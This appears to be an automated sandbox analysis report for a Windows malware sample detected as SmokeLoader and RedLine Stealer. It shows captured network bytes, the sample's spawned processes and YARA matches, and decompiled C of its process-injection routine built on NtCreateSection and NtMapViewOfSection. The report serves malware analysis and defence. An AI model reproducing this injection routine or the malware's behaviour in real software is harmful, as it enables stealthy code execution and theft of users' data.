b9 81 c4 3c 16 37 47 fd 81 75 bc 5b 4d 27 8e 8d e4 79 49 9d 23 07 03 10 3d 51 89 09 4e f3 94 8c 85 4d 1d 30 48
                                                            Data Ascii: 1ff85;H40kPK0kR,'b0d66vr.gPNm6;L"CpQ,=,^ZN.<1n#"B'{wo_ns"R/7sgB,F)RdD4}8!D7OL@$?eqO)wD1iqp<7Gu[M'yI#=QNM0H
                                                            2022-11-29 23:11:39 UTC448INData Raw: 32 30 30 30 0d 0a
                                                            Data Ascii: 2000
                                                            2022-11-29 23:11:39 UTC448INData Raw: 55 0d 60 d1 42 18 d7 0d 5e 12 be 5b 3e 83 23 14 a7 70 30 9d 31 d3 29 6e 73 d6 fb 63 ea 98 c6 61 f4 1f 29 6f 5e 3f 27 31 fa eb 20 e4 31 e4 37 87 94 01 60 14 79 37 9f e1 cd db 9b e7 45 88 59 05 f5 90 95 87 a4 bd 18 f3 96 7e 6a 68 43 62 ba c2 27 e0 2b 7c 1c 6a 0b 8b e9 66 d2 75 7b 34 24 9c f0 83 53 53 13 b9 01 f9 98 89 c2 a1 b2 4d b8 c5 57 7c 2b 57 e4 b9 98 6b 80 16 06 01 19 29 4c a9 72 b1 f4 23 2e dd be da c0 17 86 87 08 e8 41 23 85 a6 10 18 db e8 f4 25 b0 82 ab 65 bb a5 b0 b6 6b 35 9d 2e fb 32 50 85 2e 56 6c c3 94 bd c7 84 d8 19 7a f4 0a 09 62 9a 32 d3 92 93 32 44 da 4b 56 07 0b 0a 5c 19 72 46 af 8d 98 6a 65 1c 04 8b 86 be fc 01 ba ef 2f 29 a0 00 90 00 56 4f e6 6b 99 2c bc 1c 88 0d e7 48 32 84 ac 43 97 62 9b 85 39 12 ab 83 ec 10 20 e9 b5 ce db 08 e9 9a 5f
                                                            Data Ascii: U`B^[>#p01)nsca)o^?'1 17`y7EY~jhCb'+|jfu{4$SSMW|+Wk)Lr#.A#%ek5.2P.Vlzb22DKV\rFje/)VOk,H2Cb9 _
                                                            2022-11-29 23:11:39 UTC456INData Raw: 0d 0a
                                                            Data Ascii:
                                                            2022-11-29 23:11:39 UTC456INData Raw: 32 30 30 30 0d 0a 8a d7 83 00 53 81 a8 00 39 82 2c 00 c7 c6 d1 00 7f 9e c9 00 7c 88 c8 00 db a8 36 00 be 81 d0 00 ca 7f 95 00 81 7b c7 00 be a2 c8 00 31 7e 65 00 7d 81 af 00 4b 6a 30 00 7b 80 89 00 91 ae bf 00 4c 34 7e 00 5b 82 9c 00 cf 84 a3 00 28 3e 34 00 80 b0 c3 00 7e 35 80 00 cf d0 bf 00 81 80 a5 00 83 82 ca 00 30 2b 24 00 cb c4 be 00 81 a8 c2 00 5d 33 c2 00 68 83 ac 00 84 80 94 00 7e 76 d6 00 cb 8f 7f 00 d7 b9 7b 00 34 81 57 00 7c 7f 3f 00 81 8f be 00 33 81 3e 00 c3 81 d0 00 cc 7b 82 00 83 2d 5b 00 d4 c8 cc 00 8a c0 7e 00 7d cb 65 00 9d 80 36 00 d2 b5 ad 00 6c 7a 9f 00 cd 82 a5 00 c6 cf 9a 00 7c a2 c2 00 44 7b a3 00 7b ce 81 00 76 37 78 00 81 7d ab 00 3d 54 32 00 6c 2f 86 00 c2 c2 d1 00 cc 51 4c 00 51 85 3d 00 81 b4 bc 00 2b 95 6b 00 b5 d1 7b 00 7c
                                                            Data Ascii: 2000S9,|6{1~e}Kj0{L4~[(>4~50+$]3h~v{4W|?3>{-[~}e6lz|D{{v7x}=T2l/QLQ=+k{|
                                                            2022-11-29 23:11:39 UTC464INData Raw: 66 75 73 75 66 6f
                                                            Data Ascii: fusufo
                                                            2022-11-29 23:11:39 UTC464INData Raw: 0d 0a
                                                            Data Ascii:
                                                            2022-11-29 23:11:39 UTC464INData Raw: 63 33 38 0d 0a 62 6f 6a 61 2e 20 56 65 78 65 62 61 6a 69 73 6f 20 68 61 76 69 63 20 76 6f 74 2e 20 46 69 72 61 66 6f 6e 6f 2e 20 44 6f 7a 65 6b 61 7a 6f 7a 65 7a 75 77 75 66 20 63 75 74 6f 74 61 77 65 6b 61 6e 61 67 20 77 61 62 61 74 65 6e 69 6a 65 6c 75 20 76 69 6c 61 67 61 68 20 6b 65 76 75 63 69 67 6f 67 6f 62 61 2e 20 42 75 6a 6f 74 65 66 61 20 7a 75 64 2e 20 44 65 68 61 6a 65 73 69 6e 61 6c 65 66 75 79 20 63 65 77 75 62 69 70 61 77 65 77 6f 63 2e 20 58 6f 73 69 6b 65 6b 69 76 20 6e 6f 6d 65 6b 6f 6a 69 64 6f 78 6f 63 2e 20 48 65 78 65 6c 6f 64 69 63 75 6a 65 63 20 63 6f 70 61 66 6f 77 65 74 69 6c 69 72 65 79 20 68 75 66 6f 74 69 70 20 77 6f 77 20 6a 6f 64 69 2e 20 53 61 6a 69 77 75 63 69 67 61 6d 75 6d 61 66 20 79 65 76 61 62 75 76 61 74 75 73 2e 20
                                                            Data Ascii: c38boja. Vexebajiso havic vot. Firafono. Dozekazozezuwuf cutotawekanag wabatenijelu vilagah kevucigogoba. Bujotefa zud. Dehajesinalefuy cewubipawewoc. Xosikekiv nomekojidoxoc. Hexelodicujec copafowetilirey hufotip wow jodi. Sajiwucigamumaf yevabuvatus.


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:00:10:00
                                                            Start date:30/11/2022
                                                            Path:C:\Users\user\Desktop\file.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\Desktop\file.exe
                                                            Imagebase:0x400000
                                                            File size:149504 bytes
                                                            MD5 hash:1CF06BEB83D2BD1AFD1B9B62994E7549
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.340150414.0000000002080000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.340150414.0000000002080000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.339969412.0000000000509000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000003.247155743.0000000002080000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.340103222.0000000002070000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.340254010.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.340254010.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                            Reputation:low

                                                            General

                                                            Target ID:1
                                                            Start time:00:10:07
                                                            Start date:30/11/2022
                                                            Path:C:\Windows\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\Explorer.EXE
                                                            Imagebase:0x7ff647860000
                                                            File size:3933184 bytes
                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000000.327101814.0000000004E61000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000000.327101814.0000000004E61000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                                            Reputation:high

                                                            General

                                                            Target ID:9
                                                            Start time:00:10:59
                                                            Start date:30/11/2022
                                                            Path:C:\Users\user\AppData\Roaming\dfhwrav
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Roaming\dfhwrav
                                                            Imagebase:0x400000
                                                            File size:149504 bytes
                                                            MD5 hash:1CF06BEB83D2BD1AFD1B9B62994E7549
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.385320932.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000009.00000002.385320932.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.385296441.0000000002080000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000009.00000002.385296441.0000000002080000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000003.373157026.0000000002080000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000009.00000002.384994661.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000009.00000002.385082783.00000000006F8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            Reputation:low

                                                            General

                                                            Target ID:10
                                                            Start time:00:11:16
                                                            Start date:30/11/2022
                                                            Path:C:\Users\user\AppData\Local\Temp\ADCA.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Local\Temp\ADCA.exe
                                                            Imagebase:0x400000
                                                            File size:3776000 bytes
                                                            MD5 hash:2479739C5D062ECB325147623241F007
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:Borland Delphi
                                                            Yara matches:
                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000A.00000002.477294048.00000000025CA000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000A.00000002.503903306.0000000002950000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            Reputation:low

                                                            General

                                                            Target ID:13
                                                            Start time:00:11:36
                                                            Start date:30/11/2022
                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\system32\rundll32.exe C:\Users\user\AppData\Local\Temp\Serpodtudpwhhta.dll,start
                                                            Imagebase:0x1b0000
                                                            File size:61952 bytes
                                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:Borland Delphi
                                                            Reputation:high

                                                            General

                                                            Target ID:16
                                                            Start time:00:11:39
                                                            Start date:30/11/2022
                                                            Path:C:\Users\user\AppData\Local\Temp\5AF.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Local\Temp\5AF.exe
                                                            Imagebase:0x400000
                                                            File size:478208 bytes
                                                            MD5 hash:C81AB83835C2669DBE57C43DB54571B7
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000010.00000002.491008397.00000000005E9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000002.486093572.0000000000413000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000010.00000002.495741535.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            Reputation:low

                                                            General

                                                            Target ID:19
                                                            Start time:00:11:48
                                                            Start date:30/11/2022
                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 688
                                                            Imagebase:0x10e0000
                                                            File size:434592 bytes
                                                            MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Target ID:22
                                                            Start time:00:11:52
                                                            Start date:30/11/2022
                                                            Path:C:\Users\user\AppData\Local\Temp\5AF.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Local\Temp\5AF.exe"
                                                            Imagebase:0x400000
                                                            File size:478208 bytes
                                                            MD5 hash:C81AB83835C2669DBE57C43DB54571B7
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000016.00000002.521716515.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000016.00000002.517229882.0000000000413000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000016.00000002.518252636.000000000059E000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                            Reputation:low

                                                            General

                                                            Target ID:23
                                                            Start time:00:12:04
                                                            Start date:30/11/2022
                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 688
                                                            Imagebase:0x10e0000
                                                            File size:434592 bytes
                                                            MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:3.4%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:33%
                                                              Total number of Nodes:91
                                                              Total number of Limit Nodes:3
                                                              execution_graph 7130 402aa1 7131 402b0a 7130->7131 7132 402bcb 7131->7132 7133 401890 8 API calls 7131->7133 7133->7132 7067 2070005 7084 207092b GetPEB 7067->7084 7069 2070030 7086 207003c 7069->7086 7085 2070972 7084->7085 7085->7069 7087 2070049 7086->7087 7088 207004c 7086->7088 7089 2070e0f 2 API calls 7088->7089 7090 2070223 7089->7090 7091 2070d90 GetPEB 7090->7091 7092 2070238 VirtualAlloc 7091->7092 7093 2070265 7092->7093 7094 20702ce VirtualProtect 7093->7094 7096 207030b 7094->7096 7095 2070439 VirtualFree 7099 20704be LoadLibraryA 7095->7099 7096->7095 7098 20708c7 7099->7098 7100 2070001 7101 2070005 7100->7101 7102 207092b GetPEB 7101->7102 7103 2070030 7102->7103 7104 207003c 7 API calls 7103->7104 7106 2070038 7104->7106 7105 2070049 7106->7105 7107 2070e0f 2 API calls 7106->7107 7108 2070223 7107->7108 7109 2070d90 GetPEB 7108->7109 7110 2070238 VirtualAlloc 7109->7110 7111 2070265 7110->7111 7112 20702ce VirtualProtect 7111->7112 7114 207030b 7112->7114 7113 2070439 VirtualFree 7117 20704be LoadLibraryA 7113->7117 7114->7113 7116 20708c7 7117->7116 6953 402b36 6954 402b47 6953->6954 6956 402bcb 6954->6956 6957 401890 6954->6957 6958 401898 6957->6958 6959 4018c3 Sleep 6958->6959 6960 4018de 6959->6960 6962 4018ef 6960->6962 6963 4014cf 6960->6963 6962->6956 6964 4014df 6963->6964 6965 40156f NtDuplicateObject 6964->6965 6967 40168b 6964->6967 6966 40158c NtCreateSection 6965->6966 6965->6967 6968 4015b2 NtMapViewOfSection 6966->6968 6969 40160c NtCreateSection 6966->6969 6967->6962 6968->6969 6970 4015d5 NtMapViewOfSection 6968->6970 6969->6967 6971 401638 6969->6971 6970->6969 6972 4015f3 6970->6972 6971->6967 6973 401642 NtMapViewOfSection 6971->6973 6972->6969 6973->6967 6974 401669 NtMapViewOfSection 6973->6974 6974->6967 6975 207003c 6976 2070049 6975->6976 6977 207004c 6975->6977 6989 2070e0f SetErrorMode SetErrorMode 6977->6989 6982 2070265 6983 20702ce VirtualProtect 6982->6983 6985 207030b 6983->6985 6984 2070439 VirtualFree 6988 20704be LoadLibraryA 6984->6988 6985->6984 6987 20708c7 6988->6987 6990 2070223 6989->6990 6991 2070d90 6990->6991 6992 2070dad 6991->6992 6993 2070dbb GetPEB 6992->6993 6994 2070238 VirtualAlloc 6992->6994 6993->6994 6994->6982 6995 4014db 6996 4014f1 6995->6996 6997 40156f NtDuplicateObject 6996->6997 6999 40168b 6996->6999 6998 40158c NtCreateSection 6997->6998 6997->6999 7000 4015b2 NtMapViewOfSection 6998->7000 7001 40160c NtCreateSection 6998->7001 7000->7001 7002 4015d5 NtMapViewOfSection 7000->7002 7001->6999 7003 401638 7001->7003 7002->7001 7004 4015f3 7002->7004 7003->6999 7005 401642 NtMapViewOfSection 7003->7005 7004->7001 7005->6999 7006 401669 NtMapViewOfSection 7005->7006 7006->6999 7043 40189d 7044 4018a0 7043->7044 7045 4018c3 Sleep 7044->7045 7046 4018de 7045->7046 7047 4014cf 7 API calls 7046->7047 7048 4018ef 7046->7048 7047->7048

                                                              Executed Functions

                                                              Function 004014CF Relevance: 10.7, APIs: 7, Instructions: 198nativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 86 4014cf-401519 call 4011bb 95 40151b 86->95 96 40151e-401523 86->96 95->96 98 401845-40184d 96->98 99 401529-40153a 96->99 98->96 102 401540-401569 99->102 103 401843-401852 99->103 102->103 111 40156f-401586 NtDuplicateObject 102->111 105 401868 103->105 106 401859-401864 103->106 105->106 108 40186b-40188d call 4011bb 105->108 106->108 111->103 113 40158c-4015b0 NtCreateSection 111->113 116 4015b2-4015d3 NtMapViewOfSection 113->116 117 40160c-401632 NtCreateSection 113->117 116->117 119 4015d5-4015f1 NtMapViewOfSection 116->119 117->103 120 401638-40163c 117->120 119->117 121 4015f3-401609 119->121 120->103 122 401642-401663 NtMapViewOfSection 120->122 121->117 122->103 123 401669-401685 NtMapViewOfSection 122->123 123->103 125 40168b call 401690 123->125 125->103
                                                              C-Code - Quality: 58%
                                                              			E004014CF(void* __edx, void* __eflags, void* __fp0, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				long _v12;
				void* _v16;
				void* _v20;
				char _v44;
				char _v52;
				long _v56;
				long _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr _v96;
				char _v100;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t84;
				intOrPtr _t87;
				void* _t90;
				signed int _t91;
				struct _GUID _t98;
				struct _GUID _t100;
				PVOID* _t102;
				PVOID* _t104;
				signed int _t106;
				intOrPtr* _t108;
				PVOID* _t121;
				PVOID* _t123;
				intOrPtr _t127;
				void* _t128;
				signed int _t129;
				void** _t130;
				signed int _t137;
				int _t138;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				signed int _t159;
				void* _t160;
				intOrPtr* _t161;
				void* _t169;
				long _t170;
				intOrPtr _t171;
				void* _t172;
				void* _t177;
				HANDLE* _t178;
				HANDLE* _t179;
				void* _t184;
				intOrPtr* _t187;
				intOrPtr _t190;
				intOrPtr* _t191;
				signed int* _t192;
				signed int* _t193;
				signed int* _t195;
				signed int* _t196;
				long _t211;

				_t216 = __fp0;
				_t154 = __edx;
				_push(0x150b);
				_t84 =  *_t191;
				_t192 = _t191 + 4;
				_t128 = 0x37e;
				E004011BB(_t84, _t128, __edx, _t169, _t177, __eflags, __fp0);
				_t127 = _a4;
				_t170 = 0;
				_v56 = 0;
				if(gs != 0) {
					_v56 = _v56 + 1;
				}
				while(1) {
					_t87 =  *((intOrPtr*)(_t127 + 0x48))();
					if(_t87 != 0) {
						break;
					}
					 *((intOrPtr*)(_t127 + 0x1c))(0x3e8);
				}
				_v96 = _t87;
				_t178 =  &_v100;
				 *_t178 = _t170;
				 *((intOrPtr*)(_t127 + 0x4c))(_t87, _t178);
				_t90 =  *_t178;
				if(_t90 != 0) {
					_t130 =  &_v52;
					 *_t130 = _t90;
					_t130[1] = _t170;
					_t178 =  &_v44;
					 *((intOrPtr*)(_t127 + 0x10))(_t178, 0x18);
					 *_t178 = 0x18;
					_t154 = _t178;
					_push( &_v52);
					_push(_t178);
					_push(0x40);
					_push( &_v20);
					if( *((intOrPtr*)(_t127 + 0x70))() == 0 && NtDuplicateObject(_v20, 0xffffffff, 0xffffffff,  &_v16, _t170, _t170, 2) == 0) {
						_v12 = _t170;
						_t98 =  &_v84;
						 *(_t98 + 4) = _t170;
						 *_t98 = 0x5000;
						_t179 =  &_v88;
						if(NtCreateSection(_t179, 6, _t170, _t98, 4, 0x8000000, _t170) == 0) {
							_push(_v84);
							_pop( *_t25);
							_t121 =  &_v72;
							 *_t121 = _t170;
							if(NtMapViewOfSection( *_t179, 0xffffffff, _t121, _t170, _t170, _t170,  &_v60, 1, _t170, 4) == 0) {
								_t123 =  &_v64;
								 *_t123 = _t170;
								if(NtMapViewOfSection( *_t179, _v16, _t123, _t170, _t170, _t170,  &_v60, 1, _t170, 4) == 0) {
									_t190 = _v72;
									 *((intOrPtr*)(_t127 + 0x20))(_t170, _t190, 0x104);
									 *((intOrPtr*)(_t190 + 0x208)) = _a16;
									_v12 = _v12 + 1;
								}
							}
						}
						_t100 =  &_v84;
						 *(_t100 + 4) = _t170;
						 *_t100 = _a12 + 0x10000;
						_t178 =  &_v92;
						if(NtCreateSection(_t178, 0xe, _t170, _t100, 0x40, 0x8000000, _t170) == 0 && _v12 != 0) {
							_push(_v84);
							_pop( *_t46);
							_t102 =  &_v76;
							 *_t102 = _t170;
							if(NtMapViewOfSection( *_t178, 0xffffffff, _t102, _t170, _t170, _t170,  &_v60, 1, _t170, 4) == 0) {
								_t104 =  &_v68;
								 *_t104 = _t170;
								_t211 = NtMapViewOfSection( *_t178, _v16, _t104, _t170, _t170, _t170,  &_v60, 1, _t170, 0x20);
								if(_t211 == 0) {
									L21();
									if(_t211 == 0 && _t211 != 0) {
										asm("in eax, 0x4a");
									}
									_push(0x2260);
									_t155 =  *_t192;
									_t195 =  &(_t192[1]);
									_push(_t155);
									_t106 =  *_t195;
									_t196 =  &(_t195[1]);
									_t156 = _t155 << 5;
									_t157 = _t156 + _t106;
									asm("lodsb");
									_t158 = _t157;
									asm("loop 0xffffffc3");
									_t159 = _t158 ^ 0xc66a5524;
									_t192 = _t196 - _t159;
									_t184 = _a8 +  *_a8;
									_t137 =  *(_t184 + 6) & 0x0000ffff;
									_push(_t184);
									_t160 = _t184;
									if(_v56 == 0) {
										_t161 = _t160 + 0xf8;
										__eflags = _t161;
									} else {
										_t161 = _t160 + 0x108;
									}
									_push(_t137);
									_t138 =  *(_t161 + 0x10);
									if(_t138 != 0) {
										memcpy( *((intOrPtr*)(_t161 + 0xc)) + _v76,  *((intOrPtr*)(_t161 + 0x14)) + _a8, _t138);
										_t192 =  &(_t192[3]);
									}
									asm("loop 0xffffffe6");
									_pop(_t178);
									_t215 = _v56;
									if(_v56 == 0) {
										_push(_t178);
										_t154 = _t178[0xd] - _v68;
										_t187 = _t178[0x28] + _v76;
										__eflags = _t187;
										while(1) {
											__eflags =  *_t187;
											if( *_t187 == 0) {
												break;
											}
											_t171 =  *_t187;
											_t187 = _t187 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t154;
												__eflags =  *((intOrPtr*)(0 + _v76 + _t171));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t178);
										_t170 = 0;
										__eflags = 0;
										_t108 =  &_v8;
										 *_t108 = 0;
										 *((intOrPtr*)(_t127 + 0x98))(_v16, 0, 0, 0, 0, 0, _t178[0xa] + _v68, _v64, _t108, 0);
									} else {
										L54();
										_pop(_t172);
										_t170 = _t172 - 0x1781;
										 *((intOrPtr*)(_t170 + 0x17b5)) = _t170 + 0x2c1d;
										E00401256(_t127, _t170 + 0x17b5, _t170, _t178, _t215, _t170 + 0x2c1d, 0x1ad);
										0x33();
										 *((intOrPtr*)(_t170 + 0x17da)) = _t170 + 0x2c6d;
										_t154 = _v16;
										0x33();
									}
								}
							}
						}
					}
				}
				_push(0x150b);
				_t91 =  *_t192;
				_t193 =  &(_t192[1]);
				_push(0x37e);
				_t129 =  *_t193;
				return E004011BB(_t91, _t129, _t154, _t170, _t178, _t215, _t216);
			}

































































                                                              0x004014cf
                                                              0x004014cf
                                                              0x004014df
                                                              0x004014e4
                                                              0x004014e7
                                                              0x004014fe
                                                              0x00401506
                                                              0x0040150b
                                                              0x0040150e
                                                              0x00401510
                                                              0x00401519
                                                              0x0040151b
                                                              0x0040151b
                                                              0x0040151e
                                                              0x0040151e
                                                              0x00401523
                                                              0x00000000
                                                              0x00000000
                                                              0x0040184a
                                                              0x0040184a
                                                              0x00401529
                                                              0x0040152c
                                                              0x0040152f
                                                              0x00401533
                                                              0x00401536
                                                              0x0040153a
                                                              0x00401540
                                                              0x00401543
                                                              0x00401545
                                                              0x00401548
                                                              0x0040154e
                                                              0x00401551
                                                              0x00401557
                                                              0x0040155f
                                                              0x00401560
                                                              0x00401561
                                                              0x00401563
                                                              0x00401569
                                                              0x0040158c
                                                              0x0040158f
                                                              0x00401592
                                                              0x00401595
                                                              0x0040159b
                                                              0x004015b0
                                                              0x004015b2
                                                              0x004015b5
                                                              0x004015b8
                                                              0x004015bb
                                                              0x004015d3
                                                              0x004015d5
                                                              0x004015d8
                                                              0x004015f1
                                                              0x004015f3
                                                              0x004015fd
                                                              0x00401603
                                                              0x00401609
                                                              0x00401609
                                                              0x004015f1
                                                              0x004015d3
                                                              0x0040160c
                                                              0x00401618
                                                              0x0040161b
                                                              0x0040161d
                                                              0x00401632
                                                              0x00401642
                                                              0x00401645
                                                              0x00401648
                                                              0x0040164b
                                                              0x00401663
                                                              0x00401669
                                                              0x0040166c
                                                              0x00401683
                                                              0x00401685
                                                              0x0040168b
                                                              0x00401690
                                                              0x00401694
                                                              0x00401694
                                                              0x004016cf
                                                              0x004016d4
                                                              0x004016d7
                                                              0x004016e7
                                                              0x004016e8
                                                              0x004016eb
                                                              0x004016f8
                                                              0x00401702
                                                              0x00401711
                                                              0x00401719
                                                              0x0040171e
                                                              0x00401727
                                                              0x00401730
                                                              0x0040173c
                                                              0x0040173e
                                                              0x00401742
                                                              0x00401743
                                                              0x00401749
                                                              0x00401753
                                                              0x00401753
                                                              0x0040174b
                                                              0x0040174b
                                                              0x0040174b
                                                              0x00401759
                                                              0x0040175a
                                                              0x0040175f
                                                              0x0040176d
                                                              0x0040176d
                                                              0x0040176d
                                                              0x00401773
                                                              0x00401775
                                                              0x00401776
                                                              0x0040177a
                                                              0x004017e2
                                                              0x004017e6
                                                              0x004017f1
                                                              0x004017f1
                                                              0x004017f4
                                                              0x004017f4
                                                              0x004017f7
                                                              0x00000000
                                                              0x00000000
                                                              0x004017f9
                                                              0x00401803
                                                              0x00401808
                                                              0x0040180a
                                                              0x0040180f
                                                              0x0040181b
                                                              0x0040181b
                                                              0x0040181b
                                                              0x0040181d
                                                              0x0040181d
                                                              0x00401821
                                                              0x00401828
                                                              0x00401828
                                                              0x0040182a
                                                              0x0040182d
                                                              0x0040183d
                                                              0x0040177c
                                                              0x0040177c
                                                              0x00401781
                                                              0x00401782
                                                              0x00401798
                                                              0x004017a7
                                                              0x004017b4
                                                              0x004017cb
                                                              0x004017d6
                                                              0x004017d9
                                                              0x004017d9
                                                              0x0040177a
                                                              0x00401685
                                                              0x00401663
                                                              0x00401632
                                                              0x00401569
                                                              0x00401859
                                                              0x0040185e
                                                              0x00401861
                                                              0x00401872
                                                              0x00401877
                                                              0x0040188d

                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
